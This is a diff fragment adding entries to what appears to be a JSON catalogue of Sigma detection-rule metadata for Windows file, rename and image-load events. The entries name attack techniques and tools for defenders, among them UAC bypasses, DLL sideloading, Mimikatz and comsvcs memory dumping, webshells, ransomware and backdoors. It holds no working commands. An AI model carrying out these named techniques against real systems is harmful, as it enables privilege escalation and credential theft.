"logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects default PsExec service filename which indicates PsExec service installation and execution", + "uuid": "259e5a6a-b8d2-4c38-86e2-26c5e651361d", + "value": "PsExec Service File Creation", + "meta": { + "refs": [ + "https://www.jpcert.or.jp/english/pub/sr/ir_research.html", + "https://jpcertcc.github.io/ToolAnalysisResultSheet", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_tool_psexec.yml" + ], + "tags": [ + "attack.execution", + "attack.t1569.002", + "attack.s0029" + ], + "creation_date": "2017/06/12", + "filename": "file_event_win_tool_psexec.yml", + "author": "Thomas Patzke", + "level": "low", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects the usage of tsclient share to place a backdoor on the RDP source machine's startup folder", + "uuid": "52753ea4-b3a0-4365-910d-36cff487b789", + "value": "Hijack Legit RDP Session to Move Laterally", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_tsclient_filewrite_startup.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ], + "creation_date": "2019/02/21", + "filename": "file_event_win_tsclient_filewrite_startup.yml", + "author": "Samir Bousseaden", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)", + "uuid": "62ed5b55-f991-406a-85d9-e8e8fdf18789", + "value": "UAC Bypass Using Consent and Comctl32 - File", + "meta": { + "refs": [ + "https://github.com/hfiref0x/UACME", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_uac_bypass_consent_comctl32.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ], + "creation_date": "2021/08/23", + "filename": "file_event_win_uac_bypass_consent_comctl32.yml", + "author": "Christian Burkard", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects the pattern of UAC Bypass using .NET Code Profiler and mmc.exe DLL hijacking (UACMe 39)", + "uuid": "93a19907-d4f9-4deb-9f91-aac4692776a6", + "value": "UAC Bypass Using .NET Code Profiler on MMC", + "meta": { + "refs": [ + "https://github.com/hfiref0x/UACME", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_uac_bypass_dotnet_profiler.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ], + "creation_date": "2021/08/30", + "filename": "file_event_win_uac_bypass_dotnet_profiler.yml", + "author": "Christian Burkard", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects the pattern of a UAC bypass using Windows Event Viewer", + "uuid": "63e4f530-65dc-49cc-8f80-ccfa95c69d43", + "value": "UAC Bypass Using EventVwr", + "meta": { + "refs": [ + "https://twitter.com/orange_8361/status/1518970259868626944?s=20&t=RFXqZjtA7tWM3HxqEH78Aw", + "https://twitter.com/splinter_code/status/1519075134296006662?s=12&t=DLUXH86WtcmG_AZ5gY3C6g", + "https://lolbas-project.github.io/lolbas/Binaries/Eventvwr/#execute", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_uac_bypass_eventvwr.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation" + ], + "creation_date": "2022/04/27", + "filename": "file_event_win_uac_bypass_eventvwr.yml", + "author": "Antonio Cocomazzi (idea), Florian Roth (rule)", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects the creation of a file by \"dllhost.exe\" in System32 directory part of \"IDiagnosticProfileUAC\" UAC bypass technique", + "uuid": "48ea844d-19b1-4642-944e-fe39c2cc1fec", + "value": "UAC Bypass Using IDiagnostic Profile - File", + "meta": { + "refs": [ + "https://github.com/Wh04m1001/IDiagnosticProfileUAC", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_uac_bypass_idiagnostic_profile.yml" + ], + "tags": [ + "attack.execution", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ], + "creation_date": "2022/07/03", + "filename": "file_event_win_uac_bypass_idiagnostic_profile.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)", + "uuid": "bdd8157d-8e85-4397-bb82-f06cc9c71dbb", + "value": "UAC Bypass Using IEInstal - File", + "meta": { + "refs": [ + "https://github.com/hfiref0x/UACME", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_uac_bypass_ieinstal.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ], + "creation_date": "2021/08/30", + "filename": "file_event_win_uac_bypass_ieinstal.yml", + "author": "Christian Burkard", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)", + "uuid": "41bb431f-56d8-4691-bb56-ed34e390906f", + "value": "UAC Bypass Using MSConfig Token Modification - File", + "meta": { + "refs": [ + "https://github.com/hfiref0x/UACME", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_uac_bypass_msconfig_gui.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ], + "creation_date": "2021/08/30", + "filename": "file_event_win_uac_bypass_msconfig_gui.yml", + "author": "Christian Burkard", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)", + "uuid": "7fff6773-2baa-46de-a24a-b6eec1aba2d1", + "value": "UAC Bypass Using NTFS Reparse Point - File", + "meta": { + "refs": [ + "https://github.com/hfiref0x/UACME", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_uac_bypass_ntfs_reparse_point.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ], + "creation_date": "2021/08/30", + "filename": "file_event_win_uac_bypass_ntfs_reparse_point.yml", + "author": "Christian Burkard", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", + "uuid": "155dbf56-e0a4-4dd0-8905-8a98705045e8", + "value": "UAC Bypass Abusing Winsat Path Parsing - File", + "meta": { + "refs": [ + "https://github.com/hfiref0x/UACME", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_uac_bypass_winsat.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ], + "creation_date": "2021/08/30", + "filename": "file_event_win_uac_bypass_winsat.yml", + "author": "Christian Burkard", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", + "uuid": "68578b43-65df-4f81-9a9b-92f32711a951", + "value": "UAC Bypass Using Windows Media Player - File", + "meta": { + "refs": [ + "https://github.com/hfiref0x/UACME", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_uac_bypass_wmp.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ], + "creation_date": "2021/08/23", + "filename": "file_event_win_uac_bypass_wmp.yml", + "author": "Christian Burkard", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Possible webshell file creation on a static web site", + "uuid": "39f1f9f2-9636-45de-98f6-a4046aa8e4b9", + "value": "Windows Webshell Creation", + "meta": { + "refs": [ + "PT ESC rule and personal experience", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_webshell_creation_detect.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1505.003" + ], + "creation_date": "2019/10/22", + "filename": "file_event_win_webshell_creation_detect.yml", + "author": "Beyu Denis, oscd.community, Tim Shelton", + "level": "high", + "falsepositive": [ + "Legitimate administrator or developer creating legitimate executable files in a web application folder" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects WerFault copoed to a suspicious folder, which could be a sign of WerFault DLL hijacking", + "uuid": "28a452f3-786c-4fd8-b8f2-bddbe9d616d1", + "value": "Creation of an WerFault.exe in Unusual Folder", + "meta": { + "refs": [ + "https://www.bleepingcomputer.com/news/security/hackers-are-now-hiding-malware-in-windows-event-logs/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_werfault_dll_hijacking.yml" + ], + "tags": [ + "attack.persistence", + "attack.defense_evasion", + "attack.t1574.001" + ], + "creation_date": "2022/05/09", + "filename": "file_event_win_werfault_dll_hijacking.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed)", + "uuid": "d353dac0-1b41-46c2-820c-d7d2561fc6ed", + "value": "AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl - File", + "meta": { + "refs": [ + "https://posts.specterops.io/application-whitelisting-bypass-and-arbitrary-unsigned-code-execution-technique-in-winrm-vbs-c8c24fb40404", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_winrm_awl_bypass.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1216" + ], + "creation_date": "2020/10/06", + "filename": "file_event_win_winrm_awl_bypass.yml", + "author": "Julia Fomina, oscd.community", + "level": "medium", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects file creation patterns noticeable during the exploitation of CVE-2021-40444", + "uuid": "60c0a111-787a-4e8a-9262-ee485f3ef9d5", + "value": "Suspicious Word Cab File Write CVE-2021-40444", + "meta": { + "refs": [ + "https://twitter.com/RonnyTNL/status/1436334640617373699?s=20", + "https://twitter.com/vanitasnk/status/1437329511142420483?s=21", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_winword_cve_2021_40444.yml" + ], + "tags": [ + "attack.resource_development", + "attack.t1587" + ], + "creation_date": "2021/09/10", + "filename": "file_event_win_winword_cve_2021_40444.yml", + "author": "Florian Roth, Sittikorn S", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects the creation of the default output filename used by the wmicexec tool", + "uuid": "8d5aca11-22b3-4f22-b7ba-90e60533e1fb", + "value": "Wmiexec Default Output File", + "meta": { + "refs": [ + "https://www.crowdstrike.com/blog/how-to-detect-and-prevent-impackets-wmiexec/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_wmiexec_default_filename.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1047" + ], + "creation_date": "2022/06/02", + "filename": "file_event_win_wmiexec_default_filename.yml", + "author": "Nasreddine Bencherchali", + "level": "critical", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network and loading it for a WMI DLL Hijack scenario.", + "uuid": "614a7e17-5643-4d89-b6fe-f9df1a79641c", + "value": "Wmiprvse Wbemcomn DLL Hijack - File", + "meta": { + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/08_lateral_movement/WIN-201009173318.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_wmiprvse_wbemcomn_dll_hijack.yml" + ], + "tags": [ + "attack.execution", + "attack.t1047", + "attack.lateral_movement", + "attack.t1021.002" + ], + "creation_date": "2020/10/12", + "filename": "file_event_win_wmiprvse_wbemcomn_dll_hijack.yml", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects file writes of WMI script event consumer", + "uuid": "33f41cdd-35ac-4ba8-814b-c6a4244a1ad4", + "value": "WMI Persistence - Script Event Consumer File Write", + "meta": { + "refs": [ + "https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_wmi_persistence_script_event_consumer_write.yml" + ], + "tags": [ + "attack.t1546.003", + "attack.persistence" + ], + "creation_date": "2018/03/07", + "filename": "file_event_win_wmi_persistence_script_event_consumer_write.yml", + "author": "Thomas Patzke", + "level": "high", + "falsepositive": [ + "Dell Power Manager (C:\\Program Files\\Dell\\PowerManager\\DpmPowerPlanSetup.exe)" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects creation of template files for Microsoft Office from outside Office", + "uuid": "0e20c89d-2264-44ae-8238-aeeaba609ece", + "value": "Office Template Creation", + "meta": { + "refs": [ + "https://insight-jp.nttsecurity.com/post/102hojk/operation-restylink-apt-campaign-targeting-japanese-companies", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_word_template_creation.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1137" + ], + "creation_date": "2022/06/02", + "filename": "file_event_win_word_template_creation.yml", + "author": "Max Altgelt", + "level": "high", + "falsepositive": [ + "Loading a user environment from a backup or a domain controller", + "Synchronization of templates" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects creation of a file named \"wpbbin\" in the \"%systemroot%\\system32\\\" directory. Which could be indicative of UEFI based persistence method", + "uuid": "e94b9ddc-eec5-4bb8-8a58-b9dc5f4e185f", + "value": "UEFI Persistence Via Wpbbin - FileCreation", + "meta": { + "refs": [ + "https://grzegorztworek.medium.com/using-uefi-to-inject-executable-files-into-bitlocker-protected-drives-8ff4ca59c94c", + "https://persistence-info.github.io/Data/wpbbin.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_wpbbin_persistence.yml" + ], + "tags": [ + "attack.persistence", + "attack.defense_evasion", + "attack.t1542.001" + ], + "creation_date": "2022/07/18", + "filename": "file_event_win_wpbbin_persistence.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Legitimate usage of the file by hardware manufacturer such as lenovo (Thanks @0gtweet for the tip)" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Aversaries may use to interact with a remote network share using Server Message Block (SMB).\nThis technique is used by post-exploitation frameworks.\n", + "uuid": "4aafb0fa-bff5-4b9d-b99e-8093e659c65f", + "value": "Writing Local Admin Share", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.002/T1021.002.md#atomic-test-4---execute-command-writing-output-to-local-admin-share", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_writing_local_admin_share.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1546.002" + ], + "creation_date": "2022/01/01", + "filename": "file_event_win_writing_local_admin_share.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "file_event", + "logsource.product": "windows" + } + }, + { + "description": "Detects cases in which a file gets renamed to .dll, which often happens to bypass perimeter protection", + "uuid": "bbfd974c-248e-4435-8de6-1e938c79c5c1", + "value": "Rename Common File to DLL File", + "meta": { + "refs": [ + "https://twitter.com/ffforward/status/1481672378639912960", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1036/T1036.md#atomic-test-1---system-file-copied-to-unusual-location", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_rename/file_rename_win_not_dll_to_dll.yml" + ], + "tags": "No established tags", + "creation_date": "2022/02/19", + "filename": "file_rename_win_not_dll_to_dll.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Application installation" + ], + "logsource.category": "file_rename", + "logsource.product": "windows" + } + }, + { + "description": "Detects possible ransomware adding a custom extension to the encrypted files, such as \".jpg.crypted\", \".docx.locky\" etc.", + "uuid": "e3f673b3-65d1-4d80-9146-466f8b63fa99", + "value": "Suspicious Appended Extension", + "meta": { + "refs": [ + "https://app.any.run/tasks/d66ead5a-faf4-4437-93aa-65785afaf9e5/", + "https://blog.cyble.com/2022/08/10/onyx-ransomware-renames-its-leak-site-to-vsop/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_rename/file_rename_win_ransomware.yml" + ], + "tags": [ + "attack.impact", + "attack.t1486" + ], + "creation_date": "2022/07/16", + "filename": "file_rename_win_ransomware.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Backup software" + ], + "logsource.category": "file_rename", + "logsource.product": "windows" + } + }, + { + "description": "Detects abusing Azure Browser SSO by requesting OAuth 2.0 refresh tokens for an Azure-AD-authenticated Windows user (i.e. the machine is joined to Azure AD and a user logs in with their Azure AD account)\nwanting to perform SSO authentication in the browser.\nAn attacker can use this to authenticate to Azure AD in a browser as that user.\n", + "uuid": "50f852e6-af22-4c78-9ede-42ef36aa3453", + "value": "Abusing Azure Browser SSO", + "meta": { + "refs": [ + "https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_abusing_azure_browser_sso.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1574.002" + ], + "creation_date": "2020/07/15", + "filename": "image_load_abusing_azure_browser_sso.yml", + "author": "Den Iuzvyk", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "image_load", + "logsource.product": "windows" + } + }, + { + "description": "Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe", + "uuid": "fe6e002f-f244-4278-9263-20e4b593827f", + "value": "Alternate PowerShell Hosts - Image", + "meta": { + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190610201010.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_alternate_powershell_hosts_moduleload.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ], + "creation_date": "2019/09/12", + "filename": "image_load_alternate_powershell_hosts_moduleload.yml", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "level": "low", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "image_load", + "logsource.product": "windows" + } + }, + { + "description": "Detects loading of Microsoft Defender's DLLs by its processes (MpCmdRun and NisSrv) from the non-default directory which may be an attempt to sideload arbitrary DLL", + "uuid": "418dc89a-9808-4b87-b1d7-e5ae0cb6effc", + "value": "Microsoft Defender Loading DLL from Nondefault Path", + "meta": { + "refs": [ + "https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_defender_load_dll_from_nondefault_path.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1574.002" + ], + "creation_date": "2022/08/02", + "filename": "image_load_defender_load_dll_from_nondefault_path.yml", + "author": "Bhabesh Raj", + "level": "high", + "falsepositive": [ + "Very unlikely" + ], + "logsource.category": "image_load", + "logsource.product": "windows" + } + }, + { + "description": "Detects DLL image load activity as used by FoggyWeb backdoor loader", + "uuid": "640dc51c-7713-4faa-8a0e-e7c0d9d4654c", + "value": "FoggyWeb Backdoor DLL Loading", + "meta": { + "refs": [ + "https://www.microsoft.com/security/blog/2021/09/27/foggyweb-targeted-nobelium-malware-leads-to-persistent-backdoor/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_foggyweb_nobelium.yml" + ], + "tags": [ + "attack.resource_development", + "attack.t1587" + ], + "creation_date": "2021/09/27", + "filename": "image_load_foggyweb_nobelium.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "image_load", + "logsource.product": "windows" + } + }, + { + "description": "Detects loading of essential DLL used by PowerShell, but not by the process powershell.exe. Detects meterpreter's \"load powershell\" extension.", + "uuid": "092bc4b9-3d1d-43b4-a6b4-8c8acd83522f", + "value": "In-memory PowerShell", + "meta": { + "refs": [ + "https://adsecurity.org/?p=2921", + "https://github.com/p3nt4/PowerShdll", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_in_memory_powershell.yml" + ], + "tags": [ + "attack.t1059.001", + "attack.execution" + ], + "creation_date": "2019/11/14", + "filename": "image_load_in_memory_powershell.yml", + "author": "Tom Kern, oscd.community, Natalia Shornikova, Tim Shelton", + "level": "medium", + "falsepositive": [ + "Used by some .NET binaries, minimal on user workstation.", + "Used by Microsoft SQL Server Management Studio" + ], + "logsource.category": "image_load", + "logsource.product": "windows" + } + }, + { + "description": "Detects certain DLL loads when Mimikatz gets executed", + "uuid": "c0478ead-5336-46c2-bd5e-b4c84bc3a36e", + "value": "Mimikatz In-Memory", + "meta": { + "refs": [ + "https://securityriskadvisors.com/blog/post/detecting-in-memory-mimikatz/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_mimikatz_inmemory_detection.yml" + ], + "tags": [ + "attack.s0002", + "attack.t1003", + "attack.lateral_movement", + "attack.credential_access", + "car.2019-04-004" + ], + "creation_date": "2017/03/13", + "filename": "image_load_mimikatz_inmemory_detection.yml", + "author": "sigma", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "image_load", + "logsource.product": "windows" + } + }, + { + "description": "Detects both of CVE-2022-30190 / Follina and DogWalk vulnerability exploiting msdt.exe binary to load sdiageng.dll binary", + "uuid": "ec8c4047-fad9-416a-8c81-0f479353d7f6", + "value": "MSDT.exe Loading Diagnostic Library", + "meta": { + "refs": [ + "https://www.securonix.com/blog/detecting-microsoft-msdt-dogwalk/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_msdt_sdiageng.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1202", + "cve.2022.30190" + ], + "creation_date": "2022/06/17", + "filename": "image_load_msdt_sdiageng.yml", + "author": "Greg (rule)", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "image_load", + "logsource.product": "windows" + } + }, + { + "description": "Detects processes loading modules related to PCRE.NET package", + "uuid": "84b0a8f3-680b-4096-a45b-e9a89221727c", + "value": "PCRE.NET Package Image Load", + "meta": { + "refs": [ + "https://twitter.com/rbmaslen/status/1321859647091970051", + "https://twitter.com/tifkin_/status/1321916444557365248", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_pcre_net_load.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ], + "creation_date": "2020/10/29", + "filename": "image_load_pcre_net_load.yml", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "image_load", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report", + "uuid": "35a7dc42-bc6f-46e0-9f83-81f8e56c8d4b", + "value": "Pingback Backdoor - Image", + "meta": { + "refs": [ + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/backdoor-at-the-end-of-the-icmp-tunnel", + "https://app.any.run/tasks/4a54c651-b70b-4b72-84d7-f34d301d6406", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_pingback_backdoor.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1574.001" + ], + "creation_date": "2021/05/05", + "filename": "image_load_pingback_backdoor.yml", + "author": "Bhabesh Raj", + "level": "high", + "falsepositive": [ + "Very unlikely" + ], + "logsource.category": "image_load", + "logsource.product": "windows" + } + }, + { + "description": "Detects rundll32 loading a renamed comsvcs.dll to dump process memory", + "uuid": "8cde342c-ba48-4b74-b615-172c330f2e93", + "value": "Rundll32 Loading Renamed Comsvcs DLL", + "meta": { + "refs": [ + "https://twitter.com/sbousseaden/status/1555200155351228419", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_rundll32_loading_renamed_comsvcs.yml" + ], + "tags": [ + "attack.credential_access", + "attack.defense_evasion", + "attack.t1003.001" + ], + "creation_date": "2022/08/14", + "filename": "image_load_rundll32_loading_renamed_comsvcs.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "image_load", + "logsource.product": "windows" + } + }, + { + "description": "Detects signs of the WMI script host process %SystemRoot%\\system32\\wbem\\scrcons.exe functionality being used via images being loaded by a process.", + "uuid": "b439f47d-ef52-4b29-9a2f-57d8a96cb6b8", + "value": "WMI Script Host Process Image Loaded", + "meta": { + "refs": [ + "https://twitter.com/HunterPlaybook/status/1301207718355759107", + "https://www.mdsec.co.uk/2020/09/i-like-to-move-it-windows-lateral-movement-part-1-wmi-event-subscription/", + "https://threathunterplaybook.com/notebooks/windows/08_lateral_movement/WIN-200902020333.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_scrcons_imageload_wmi_scripteventconsumer.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.privilege_escalation", + "attack.persistence", + "attack.t1546.003" + ], + "creation_date": "2020/09/02", + "filename": "image_load_scrcons_imageload_wmi_scripteventconsumer.yml", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "level": "medium", + "falsepositive": [ + "Legitimate event consumers", + "Dell computers on some versions register an event consumer that is known to cause false positives when brightness is changed by the corresponding keyboard button" + ], + "logsource.category": "image_load", + "logsource.product": "windows" + } + }, + { + "description": "Detects DLL sideloading of DLLs that are part of antivirus software suchas McAfee, Symantec...etc", + "uuid": "552b6b65-df37-4d3e-a258-f2fc4771ae54", + "value": "Antivirus Software DLL Sideloading", + "meta": { + "refs": [ + "https://hijacklibs.net/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_antivirus.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" + ], + "creation_date": "2022/08/17", + "filename": "image_load_side_load_antivirus.yml", + "author": "Nasreddine Bencherchali, Wietze Beukema (project and research)", + "level": "medium", + "falsepositive": [ + "Applications that load the same dlls mentioned in the detection section. Investigate them and filter them out if a lot FPs are caused.", + "Dell SARemediation plugin folder (C:\\Program Files\\Dell\\SARemediation\\plugin\\log.dll) is known to contain the 'log.dll' file.", + "The Canon MyPrinter folder 'C:\\Program Files\\Canon\\MyPrinter\\' is known to contain the 'log.dll' file" + ], + "logsource.category": "image_load", + "logsource.product": "windows" + } + }, + { + "description": "Detects DLL sideloading of \"dbgcore.dll\"", + "uuid": "9ca2bf31-0570-44d8-a543-534c47c33ed7", + "value": "DLL Sideloading Of DBGCORE.DLL", + "meta": { + "refs": [ + "https://hijacklibs.net/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_dbgcore_dll.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" + ], + "creation_date": "2022/10/25", + "filename": "image_load_side_load_dbgcore_dll.yml", + "author": "Nasreddine Bencherchali, Wietze Beukema (project and research)", + "level": "medium", + "falsepositive": [ + "Legitimate applications loading their own versions of the DLL mentioned in this rule" + ], + "logsource.category": "image_load", + "logsource.product": "windows" + } + }, + { + "description": "Detects DLL sideloading of \"dbghelp.dll\"", + "uuid": "6414b5cd-b19d-447e-bb5e-9f03940b5784", + "value": "DLL Sideloading Of DBGHELP.DLL", + "meta": { + "refs": [ + "https://hijacklibs.net/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_dbghelp_dll.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" + ], + "creation_date": "2022/10/25", + "filename": "image_load_side_load_dbghelp_dll.yml", + "author": "Nasreddine Bencherchali, Wietze Beukema (project and research)", + "level": "medium", + "falsepositive": [ + "Legitimate applications loading their own versions of the DLL mentioned in this rule" + ], + "logsource.category": "image_load", + "logsource.product": "windows" + } + }, + { + "description": "Detects DLL sideloading of DLLs usually located in system locations (System32, SysWOW64...)", + "uuid": "4fc0deee-0057-4998-ab31-d24e46e0aba4", + "value": "System DLL Sideloading From Non System Locations", + "meta": { + "refs": [ + "https://hijacklibs.net/", + "https://blog.cyble.com/2022/07/21/qakbot-resurfaces-with-new-playbook/", + "https://blog.cyble.com/2022/07/27/targeted-attacks-being-carried-out-via-dll-sideloading/", + 